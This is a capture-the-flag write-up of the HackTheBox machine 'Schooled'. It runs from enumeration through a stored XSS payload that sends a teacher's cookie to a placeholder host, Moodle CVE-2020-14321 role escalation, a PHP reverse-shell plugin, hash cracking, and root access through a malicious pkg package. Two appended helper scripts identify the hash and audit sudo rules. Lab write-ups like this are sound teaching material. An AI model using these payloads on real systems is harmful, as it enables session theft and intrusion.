![fdcb1578a7a35e87319a7e270d3465e8.png](75548eca389e4101a9b1278449efb530.png)

# Port Scanning and General Enumeration (Nmap, Gobuster)

Starting off with an all ports scan:

```
nmap -p- -T4 -oN nmap/allports 10.10.10.234

Nmap scan report for 10.10.10.234
Host is up (0.052s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
33060/tcp open  mysqlx
```

The all ports scan shows `22`, `80` and `33060` open, so we can target those:

```
nmap -T4 -p22,80,33060 -sC -sV -oN nmap/targeted 10.10.10.234

Nmap scan report for 10.10.10.234
Host is up (0.058s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.9 (FreeBSD 20200214; protocol 2.0)
| ssh-hostkey:
|   2048 1d:69:83:78:fc:91:f8:19:c8:75:a7:1e:76:45:05:dc (RSA)
|   256 e9:b2:d2:23:9d:cf:0e:63:e0:6d:b9:b1:a6:86:93:38 (ECDSA)
|_  256 7f:51:88:f7:3c:dd:77:5e:ba:25:4d:4c:09:25:ea:1f (ED25519)
80/tcp    open  http    Apache httpd 2.4.46 ((FreeBSD) PHP/7.4.15)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (FreeBSD) PHP/7.4.15
|_http-title: Schooled - A new kind of educational institute
33060/tcp open  mysqlx?
| fingerprint-strings:
```

Looks like something to do with **mysql** on `33060`. **Apache 2.4.46 (FreeBSD)** with **PHP 7.4.15** on the webserver on 80. Let's check that out first.

![4ce5210e9996b0d51c97142e6ad4e598.png](84440b720ecd470aaedfc7f502d5399f.png)

The website seems pretty boring. Nothing off in the source, and the only things that really link anywhere are the options in the navbar up top.

![7e59394a37aa8e20279b4a1444b5d1a5.png](b65122d14930484da4a644568eb8ae55.png)

There's a little bit of information in the **Contact Details**.

![3e42061a2d2685c251672cdbfcb5a1bb.png](8f91e1be11bd401cbfa58b4ac754a986.png)

I guess we should add `schooled.htb` to our hosts file just in case. More enumeration!
**Wappalyzer**:

![4a83b380dbedef9d02a541a026482261.png](e2f17770a2ed44eebb2758dd686618d8.png)

I ran a **Gobuster directory scan** using [Seclists big](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/directory-list-2.3-big.txt) but it didn't uncover anything new, so I followed that up with a **Gobuster dns scan** using [Seclists 5k](https://github.com/danielmiessler/SecLists/blob/master/Discovery/DNS/subdomains-top1million-5000.txt):

```
gobuster dns -d schooled.htb -w 5000.txt

Found: moodle.schooled.htb
```

Finally, something interesting! Add it to your hosts!

---

# Access (Moodle, Stored XSS, CVE-2020-14321)

So now that we're on `moodle.schooled.htb`, let's create an account, take a minute to browse around the site and see what's available to us.

![24302497f04971ffb8291764e7cf3899.png](3946f163151d4d2ca9bc61baa684ee6a.png)

Looks like some kind of online school?

![423e008567f3d4d9555d0be8ef949587.png](860a8e022df24f0eb6d6251410721e93.png)

So the **Mathematics** course is available for us to enroll in, and the teacher is **Manuel Phillips**. Let's enroll and learn some math!

![4b648b95c2865a9b0632940cd31ca8f8.png](6db4bc36d91b4f289019452d75a5be02.png)

Now that we're enrolled, a bunch of new options have opened up to us. We can view our classmates by clicking on **Participants**.

![d979513b884cc6cdfecaa2ef002bb5b5.png](19ec11b4744a4cab9a276158e8baf169.png)

Oh hey, the teacher is listed. Let's check out his profile.

![d4f0a0323bc18e00fa9cd552d0b5ac42.png](eb0709f502434737b586da0999586c5c.png)

Forum posts?

```
This is a self enrollment course. For students who wish to attend my lectures be sure that you have your MoodleNet profile set. Students who do not set their MoodleNet profiles will be removed from the course before the course is due to start and I will be checking all students who are enrolled on this course.

Look forward to seeing you all soon.

Manuel Phillips
```

He's going to check all of our **MoodleNet** profiles?
Well, we better update ours!

![8eee60965fc9a9094fe6cf46021b84d8.png](4ce70d1aafb040518d72bb52fdc979ef.png)

Let's see if this is vulnerable to something like **XSS**.

![4a02b4a9a699ccfaa527f0653be915da.png](04e764eac657434bb6c1782226e0c4d3.png)

![666c48618f7780442de850c3b6ad70e4.png](108db4140e964390b2880c576b5aeb23.png)

Nice. Maybe we can steal the teacher's cookie and *become* the teacher? Let's try a basic cookie stealing payload like `<img src=x onerror=this.src='http://YOURIP:YOURPORT/?'+document.cookie;>`.

Fire up a quick webserver using python3 (`python3 -m http.server`) and see what happens.

![2f2aa131b54b4a7675e97c1c3ac017d4.png](66ffe21c3980406b9688603cdd28bc3c.png)

We get a hit! Well, we get a lot of hits actually... Using that cookie and refreshing the page, we are now **Manuel Phillips**. But what good does that do us? I was on my way to unenroll all of the students when this popped up at the bottom of the page:

![bc7dc3198f9e164a82df8b5088b7f795.png](77ed9d408ef242468313c32e223cb713.png)

![dc733c5d14f230a60afefe7b058a8f91.png](4d6c9102c4a242378c984a09a08ee7fd.png)

So we're running version **3.9**. Doing research, I noticed that there's an exploit for this version that allows a **teacher** user to escalate to a **manager** user. Someone has a **POC** available on their [GitHub](https://github.com/HoangKien1020/CVE-2020-14321).

So by capturing the 'enroll' request, we can modify the **user id** value to match our teacher's **user id**, and the **role** value to **1**, which *should* allow us to escalate to a manager account by using the **Login as** feature on another manager account?
Let's give it a shot. With **BurpSuite** running and intercepting the requests, enroll a user.

![823ba55a2e8375b1805b156e910ab702.png](2cfd1d0817554ca1a3bf47db26df8fc8.png)

Capture the request, send it to repeater and turn intercept **off**.

![5b28ef9da2ee57db4123902e57bc28d5.png](63d1398e46c6461c9cfb4aa74b78164b.png)

Refresh the page and take note of **Manuel Phillips**' user id: `...r/profile.php?id=24`. Back in **BurpSuite**, in the repeater tab, edit the values `&userlist%5B%5D=29` to `&userlist%5B%5D=24` and `&roletoassign=5` to `&roletoassign=1`, and send it through.

![38e5b24d604efc5b68dd90b794699d06.png](45d0d16baf6e4e9390309b42596651e3.png)

Refresh the page to see the changes. I found this to be incredibly finicky. You may need to do it quite a few times before you have both the **teacher** user as a manager and a **student** user as a manager. Once you do, navigate to their profile and click **Log in as** under **Administration**.

![e5b3ef7e21e4cab7290520aa012b42d8.png](7c8b9587a17741728539722d1cd7454c.png)

You should then see **Site Administration** pop up in the left nav menu.

![b491daadac7f4e6a40ed9e61257400ac.png](a709252dc37e4b82801617af7c56cf07.png)

Now that we have complete control over this website, let's do some prep work.

1. Download the zip file from this [Github](https://github.com/HoangKien1020/Moodle_RCE).
2. Grab the **php-reverse-shell** from [Pentestmonkey](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php). Edit it with your **IP** and **PORT**.
3. Unzip the **rce.zip** file and **remove** `/rce/lang/en/block_rce.php`.
4. **Rename** the **php-reverse-shell.php** to **block_rce.php** and **move** it into `rce/lang/en/`.
5. Rezip the **rce** directory with `zip -r rce rce`.

Now back to the website:

1. Under **Site Administration** click **Users**.
2. Under **Permissions** click **Define Roles**.
3. Click **Manager** and then **Edit**.
4. Make sure **BurpSuite** is running and intercepting traffic.
5. Scroll all the way to the bottom and click **Save Changes**.
6. Grab the request in **BurpSuite** and replace everything from **&return** to the end with the block from this [Github](https://github.com/HoangKien1020/CVE-2020-14321) *(Payload to full permissions)*.
7. **Forward** the request.

Whew. Almost there. Now we can navigate back to **Site Administration** and...

1. Click **Plugins** and then **Install Plugins**.
2. **Choose a file...** and upload the **rce.zip**.
3. Click **Install plugin from the ZIP file**.

Once it goes through the check successfully, click continue, fire up a listener on whatever port you set in the **php-reverse-shell** (`nc -lvnp 4444`) and navigate to `/moodle/blocks/rce/lang/en/block_rce.php`.

![46eb0c35d92a68f02e90ea899a874ee4.png](55b6d74bb0c64aa4a0e4177b142d333f.png)

---

# User (Moodle, MySQL, Hashcat)

Let's stabilize our shell. Just typing `python3` won't work, so let's check and see what packages are installed with `pkg info`.

![23cbc6c8295854bb9286abd0e056bae2.png](2df08a61801649b9b342a4ceeead587f.png)

So **python3** is available. Let's find it using the **find** command: `find . -name python3 2>/dev/null`

![352b2a0c0cbf4e8190509f3354340aac.png](5e1dcec7f7dd4cbc92a33b8e36443451.png)

There it is. Let's stabilize:

```
/usr/local/bin/python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+z
stty raw -echo && fg
enter
export TERM=xterm
```

![86cad8ead1e7f002063b67af0792a750.png](4dbbfc412b1d41748303c04bd0a61d01.png)

Now we have a good shell to do some enumeration. Let's check out the [config file](https://docs.moodle.org/311/en/Configuration_file#:~:text=The%20name%20for%20Moodle's%20configuration,located%20in%20the%20moodle%20directory.) for **moodle**.
It's located at `/usr/local/www/apache24/data/moodle/config.php`:

```
$CFG->dbtype    = 'mysqli';
$CFG->dblibrary = 'native';
$CFG->dbhost    = 'localhost';
$CFG->dbname    = 'moodle';
$CFG->dbuser    = 'moodle';
$CFG->dbpass    = 'PlaybookMaster2020';
$CFG->prefix    = 'mdl_';
$CFG->dboptions = array (
  'dbpersist' => 0,
  'dbport' => 3306,
  'dbsocket' => '',
  'dbcollation' => 'utf8_unicode_ci',
);

$CFG->wwwroot   = 'http://moodle.schooled.htb/moodle';
$CFG->dataroot  = '/usr/local/www/apache24/moodledata';
$CFG->admin     = 'admin';
```

Database creds! Since we can't just call **mysql**, let's see if it's in the same place as python.

![4dbf6fc754ad070b9e4a784afed8a435.png](eaa4398dbdf84118ba25a3dad39edf58.png)

Looks like it! Let's roll through it:

1. `show databases;`
2. `show tables;`
3. `select concat(username,password) from mdl_user;`

![0aa61c1bc8e21247c78f7f1f1d9cb5ae.png](6c1acff8e684439b855e06e83e2b3822.png)

Hashes! Let's pull that **admin** hash offline and try to crack it. First, we need to identify it. Googling **hash $2y$10$** led me to this [link](https://www.php.net/manual/en/function.password-hash.php), which says that it's **Blowfish**. Using [Hashcat's example hashes page](https://hashcat.net/wiki/doku.php?id=example_hashes), we can see that **Blowfish** is mode **3200**. Let's get to cracking: `hashcat -m 3200 hashfile rockyou.txt`

After a little time we get back `$2y$10$3D/gznFHdpV6PXt1cLPhX.ViTgs87DCE5KqphQhGYR5GFbcl4qTiW:!QAZ2wsx`.

Let's try to use that password to log in as a different user.

![dffb635d083cd3b59705295ed21cfa52.png](e8e7b86a5c734037bc09d15b9b953fb4.png)

There are a couple of users that have `home` directories. Let's try **jamie** first.

![5967e4d611fbfe4aa67d41a0efb5a835.png](c41268cfc7c44785b2db16078e93bfe0.png)

Got it! Capture the user flag!

![107e14fd83a350ce7beaf0246d3377dc.png](578acb102a894241b82c3b1df2034466.png)

# Privesc (pkg, GTFOBins, fpm)

![e5a54ee86f275f21518464e0316b7a70.png](1b052e303bba4df48a8f149fc94047a5.png)

Sudo not found? Let's remedy that by setting up ssh.
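Looking back at the hash identification step from the User section: this is an added example (not part of the write-up) that parses the admin hash pulled from `mdl_user` into its modular-crypt fields and maps it to the hashcat mode used above; the mode table for the non-bcrypt prefixes is an assumption taken from hashcat's documentation.

```python
"""Identify a modular-crypt-format password hash before picking a cracking mode.

Added example, not from the original write-up. The bcrypt layout is
$<2a|2b|2y>$<cost>$<22-char salt><31-char digest>; the extra MCF prefixes and
their hashcat modes are assumptions taken from hashcat's example-hashes page.
"""
import re

# Admin hash recovered from mdl_user in the write-up, used as sample input.
ADMIN_HASH = "$2y$10$3D/gznFHdpV6PXt1cLPhX.ViTgs87DCE5KqphQhGYR5GFbcl4qTiW"

# bcrypt uses its own base64 alphabet: [./A-Za-z0-9]; cost is two decimal digits.
BCRYPT_RE = re.compile(r"^\$(2[aby])\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$")

# Other MCF prefixes met alongside bcrypt (assumed modes: md5crypt, sha256crypt, sha512crypt).
MCF_MODES = {"$1$": ("md5crypt", 500), "$5$": ("sha256crypt", 7400), "$6$": ("sha512crypt", 1800)}


def identify_hash(h: str) -> dict:
    """Return algorithm and hashcat mode; for bcrypt also the cost, salt and digest."""
    m = BCRYPT_RE.match(h)
    if m:
        variant, cost, salt, digest = m.groups()
        return {
            "algorithm": "bcrypt",  # hashcat lists this as "bcrypt $2*$, Blowfish (Unix)"
            "variant": variant,
            "hashcat_mode": 3200,
            "cost": int(cost),
            "iterations": 2 ** int(cost),  # cost 10 means 1024 key-setup rounds
            "salt": salt,
            "digest": digest,
        }
    for prefix, (name, mode) in MCF_MODES.items():
        if h.startswith(prefix):
            return {"algorithm": name, "hashcat_mode": mode}
    raise ValueError("unrecognised hash format")


if __name__ == "__main__":
    print(identify_hash(ADMIN_HASH))
```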
Cat and copy your public ssh key on your machine. If you don't have one, create a key pair using `ssh-keygen`.

```
cd ~
mkdir .ssh && chmod 700 .ssh
touch .ssh/authorized_keys && chmod 600 .ssh/authorized_keys
echo 'YOURPUBLICKEY' >> .ssh/authorized_keys
```

Then back on your box:

```
ssh jamie@10.10.10.234 -i id_rsa
```

Now we can use `sudo -l`:

```
jamie@Schooled:~ $ sudo -l
User jamie may run the following commands on Schooled:
    (ALL) NOPASSWD: /usr/sbin/pkg update
    (ALL) NOPASSWD: /usr/sbin/pkg install *
```

So we can install packages and update using **sudo**. Let's check out the [GTFOBins](https://gtfobins.github.io/gtfobins/pkg/) entry on **pkg**.

![355a21d999526dcad858fc415dc31b95.png](ac6fdb1a79bb4d109f519bd36747118a.png)

So we can use **fpm** to create a malicious package and then install it. Nice. Let's do that on our machine and transfer the malicious package over. As for the payload, all we really need to do is read the root flag. Run this on your machine:

```
TF=$(mktemp -d)
echo 'cat /root/root.txt' > $TF/z.sh
fpm -n z -s dir -t freebsd -a all --before-install $TF/z.sh $TF
```

Transfer the package over to the machine. I used **python** and **curl**:

```
curl YOURIP:YOURPORT/z-1.0.txz --output /home/jamie/z-1.0.txz
```

And now install the malicious package:

```
sudo /usr/sbin/pkg install -y --no-repo-update ./z-1.0.txz
```

![15df8cf215cd6d8e52a50fd8f143a209.png](a9336b9249b54afbb2fcbbd26a45ad40.png)

Capture that flag!

---

Back to [[HackTheBox Index]]

Tags: #htb #hackthebox #cve-2020-14321 #moodle #reverse_shell #freebsd #pkg #xss #stored_xss #gobuster #dns #hashcracking #fpm #box_writeups

Related:
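A defender-side look at the `sudo -l` rule from the Privesc section, as an added example that is not part of the write-up: it parses that output and flags NOPASSWD rules that hand a wildcard argument to a package manager, which is what lets a locally built package such as `z-1.0.txz` run its install script as root. The set of package-manager names is an assumption.

```python
"""Audit `sudo -l` output for package-manager rules with wildcard arguments.

Added example, not from the original write-up. The sample output is the text
shown on this page; PACKAGE_MANAGERS is an assumed list of tools that will
install from a local file (and so run its package scripts as root).
"""
import re
from typing import List, Tuple

# Constructed from the sudo -l output shown in the write-up.
SUDO_L_OUTPUT = """\
User jamie may run the following commands on Schooled:
    (ALL) NOPASSWD: /usr/sbin/pkg update
    (ALL) NOPASSWD: /usr/sbin/pkg install *
"""

PACKAGE_MANAGERS = {"pkg", "apt", "apt-get", "dpkg", "rpm", "yum", "dnf", "pip", "pip3"}

# (runas) [TAG: ...] /path/to/binary [args]; the header line does not start with "(".
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z]+:\s*)*)(/\S+)(?:\s+(.*))?$")


def parse_rules(output: str) -> List[Tuple[str, str, str, str]]:
    """Return (runas, tags, binary, args) for each rule line, skipping the header."""
    rules = []
    for line in output.splitlines():
        m = RULE_RE.match(line)
        if m:
            runas, tags, binary, args = m.groups()
            rules.append((runas, tags.strip(), binary, (args or "").strip()))
    return rules


def risky_rules(output: str) -> List[str]:
    """Rules where a package manager takes a wildcard: the caller chooses what is installed."""
    flagged = []
    for runas, tags, binary, args in parse_rules(output):
        name = binary.rsplit("/", 1)[-1]
        if name in PACKAGE_MANAGERS and "*" in args:
            flagged.append(f"({runas}) {tags} {binary} {args}".strip())
    return flagged


if __name__ == "__main__":
    for rule in risky_rules(SUDO_L_OUTPUT):
        print("wildcard package install:", rule)
```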